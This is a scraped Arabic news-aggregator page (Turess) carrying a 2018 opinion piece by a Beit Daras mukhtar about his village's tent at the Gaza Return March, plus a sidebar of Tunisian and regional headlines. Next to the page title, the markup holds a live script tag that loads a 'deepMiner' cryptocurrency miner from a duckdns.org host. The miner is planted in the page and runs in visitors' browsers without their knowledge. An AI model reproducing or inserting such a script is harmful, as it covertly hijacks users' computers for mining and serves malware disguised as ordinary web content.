googletag.defineSlot('/21620968445/Turess_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-362196229-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Turess_Ar_Article_1', 'div-gpt-ad-362196229-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Turess_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-362196231-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Turess_Ar_Article_3', 'div-gpt-ad-362196231-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Turess_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-362196230-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Turess_Ar_Article_2', 'div-gpt-ad-362196230-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Turess_Ar_Widget', [[222, 280]], 'div-gpt-ad-437865081-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Turess_Ar_Widget', 'div-gpt-ad-437865081-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Turess_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-710471218-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Turess_Ar_Siteunder', 'div-gpt-ad-710471218-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); تورس : خيمة فلسطينية لقرية بيت دراس<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
الشّاهد: الحكومة لن تتدخّل في عمل الصحفيين    العيادي يدعو الوزراء الجدد إلى التصريح بمكاسبهم قبل المباشرة    صادم: 2000 مليار تكلفة الفساد في تونس    بعد تأجيل الإضراب : مفاوضات بين وزارة النقل وغرفة "التاكسيات"    اليوم: ندوة وطنية حول التمكين الإقتصادي والإجتماعي للفلاحات    بفضل قطاع الفلاحة..الاقتصاد التونسي يحقق انتعاشة طفيفة    وزير الداخلية الإيطالي يستقبل 51 مهاجرا    صاعقة رعدية تودي بحياة لاعب كرة قدم    المنتخب التونسي يجري اليوم الخميس آخر حصة تدريبية قبل مواجهة مصر    فظيع: طعن عجوز ال84 سنة بآلة حادّة في أماكن مختلفة من جسدها.. وحفيدها في قفص الاتهام    أمل حجازي تؤدي مناسك العمرة (صور)    يشارك فيه ضيوف أجانب وأمراء : بن قردان تحتضن المهرجان الوطني للفروسية    اليوم: الاستماع الى هؤلاء الوزراء بمجلس نوّاب الشعب    وزير التجارة: ينتظر أن تبلغ كمية الحليب المورّدة 5.5 مليون لتر    كاس افريقيا للامم: مصر تستضيف تونس في كلاسيكو مثير وواعد    الكرة الطّائرة النّسائية : النّادي الصفاقسي ينتدب اللّاعبة رحمة العقربي    تصفيات كاس امم افريقيا – مصر – تونس : الاطارالفني للمنتخب التونسي يعقد مساء اليوم ندوة صحفية في ملعب برج العرب    منظمة الأعراف تدعو إلى إحداث خطوط تمويل عوضا عن بنك الجهات    هكذا سيكون الطقس اليوم    مصدر أمني يكشف ل"الصباح نيوز" تفاصيل اغتصاب شاب لابنة عمه ذات ال4 سنوات بحمام الأنف    ترامب يقيل مسؤولة اشتكت زوجته ميلانيا منها    التحقيق مع قائد بالشرطة الفلسطينية لتغييره إطار عربة للجيش الإسرائيلي    لأول مرة... هند صبري تتكلم عن الهجوم الحاد الذي تعرضت له بعد انتقادها لسعد لمجرد‎    دار الإفتاء المصرية تلجأ للرسوم المتحركة لمكافحة أفكار المتطرفين    في الحب والمال: هذا ما يخفيه لكم حظكم اليوم    قصيدة جديدة للشاعر كمال بوعجيلة    لصحتك : كل فنجان قهوة إضافي يطيل عمرك!    تشخيص مرض التوحد عند الأطفال    ارتفاع ب4% في حجم الصادرات    القبض على شخص من أجل السرقة تحت طائلة التهديد بسلاح أبيض    رجب حاجي يكتب لكم : الطريقة المثلى لبناء المصير المشترك    وزراء إسرائيليون : حماس "علّمت علينا" ب460 صاروخا في 24 ساعة    إمام يعلن ترشحه للانتخابات من فوق المنبر!    الفنان الشعبي قاسم كافي في ذمة الله    عدد قتلى حرائق كاليفورنيا 59 على الأقل والمفقودين 130    عصام الجبالي يتوج مع روزنبيرغ بلقب البطولة النرويجية    تصفيات كاس امم افريقيا 2019.. المدافع المصري محمود حمدي يغيب عن مباراة مصرو تونس    الجزائر: استقالة جمال ولد عباس وتساؤلات عن مصير الولاية الخامسة لبوتفليقة    بحضور ماكرون.. المغرب يطلق أسرع قطار في أفريقيا    في الغذاء دواء : 7 فوائد صحية للتمور    بورصة تونس للأوراق المالية تنهي حصة الأربعاء بشكل إيجابي    الرصد الجوي يحذّر مستعملي الطريق من الضباب الكثيف    لطفي الرياحي (رئيس المنظمة التونسية لإرشاد المستهلك):المضاربات رفعت أسعار الزقوقو والفواكه الجافة    عروض اليوم    منير العرقي يتحدث عن عرض مسرحيته الجديدة «القبلة»:أردتها قبلة على جبين «تشيكوف» وتكريما لصلاح مصدق    بعد لطيفة ونانسي وهيفاء وهبي :شعبان عبدالرحيم يتعرّض مجدّدا لتهديدات داعش    منزل بورقيبة :إيقاف مروّج مخدرات مفتش عنه    حمام الأنف:يغتصب ابنة ال 4 أعوام بوحشية بسبب خلافات مع والدها    تورّطن في البراكاجات والمخدرات:نساء يقتحمن عالم الجريمة    سلمى اللومي:هذه الاعتمادات التي تم رصدها لرئاسة الجمهورية بعنوان سنة 2019    صوت الشارع:هل ستقومون بإعداد عصيدة «الزقوقو» هذا العام ؟    لا تقطعوا نكهتنا    جماهير النادي الافريقي تحتج بحديقة الرياضة أ    لحوم ابقار مصابة بداء السل محجوزة في المسلخ البلدي بالقصرين    يمكن تجنب مرض السكري بنسبة 80 بالمائة من خلال اتباع نمط عيش متوازن (وزارة الصحة)    محمد الحبيب السلامي يسأل: قضاء يحكم ولا ينفذ        في الحب والمال: هذا ما يخفيه لكم حظكم اليوم    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





خيمة فلسطينية لقرية بيت دراس
نشر في الحوار نت يوم 28 - 03 - 2018

قرية بيت دراس من القرى الفلسطينية التي أجبر سكانها على الرحيل عنها سنة 1948، وقد عرف عن سكان قرية بيت دراس الصلابة، وعناد الرأس، وقوة الشكيمة، ويتميز أهلها بالانتماء الصادق للوطن والوفاء، والاستعداد الدائم للعطاء، وقد قدمت القرية مئات الشهداء والأسرى والجرحى، ولا يفتخر أهل بيت دراس إلا بشاهداتهم العلمية، وتضحياتهم الصادقة من أجل فلسطين، لذلك تجد أهل قرية بيت دراس رأس حربة لمعظم التنظيمات الفلسطينية، وهم في صف المقاومة، ويرفض معظمهم التفريط بذرة تراب من قريتهم التي اغتصبها الصهاينة، وأطلقوا عليها "بير توفيا".
أهل قرية بيت دراس جزء رئيسي من مسيرة العودة إلى فلسطين، وقد بدأوا في تجهيز أنفسهم ليوم العودة في 30 مارس، ليكونوا جزءاً من الحراك الوطني الذي تشارك فيه معظم التنظيمات الفلسطينية وكل القوى السياسية، ولأجل ذلك، سيكون لأهل بيت دراس خيمة فلسطينية على جانب السياج الفاصل بين قطاع غزة وأرضهم المغتصبة، والتواصل قائم بين مخاتير القرية، لترتيب المشاركة الفاعلة منذ ساعات الصباح الأولى، ليكون البدارسة في طليعة العائدين.
خيمة بيت دراس ستنافس خيام القري والمدن الفلسطينية الأخرى، من حيث عدد المشاركين، ومن حيث مدى الحضور، ومن حيث الالتزام بتعليمات المنظمين لمسيرة العودة، فمجال المنافسة هنا شريف، ومجال التزاحم هنا عطاء وفداء، وليس تكسب وارتواء، وستكون المنافسة الوطنية مفتوحة على مصراعيها، فإلى جانب خيمة بيت دراس، سيكون هنالك خيمة تحت اسم قرية حمامة، وبشيت، والسوافير، والفالوجة، ودمرة، والبطاني، ودير سنيد، وعبدس، وبيت طيما، والمجدل، والمسمية، والجلدية، وكوكبا، ويافا، وحيفا وعكا، وبقية المدن والقرى الفلسطينية المغتصبة، وستكون عين جميع المشاركين إلى فلسطين، وستلتقي قلوب كل اللاجئين على شريان وطني واحد يتدفق كرامة على تراب فلسطين المغتصبة.
سأكون شخصياً في الميدان، وبصفتي مختار إحدى عائلات قرية بيت دراس، سأتواجد في خيمة العودة التي تحمل اسم قريتنا، وهذا لا يمنع من الانتقال بين الخيام، وتبادل الزيارات مع جيراننا في القرى الفلسطينية الأخرى، في مشهد يذكرني بالأسرى الفلسطينيين في السجون الإسرائيلية، حين كانوا يتبادلون زيارة الغرف، في مشهد وطني يعزز الوحدة الوطنية، ويؤكد على التلاحم الميداني حباً بفلسطين.


انقر هنا لقراءة الخبر من مصدره.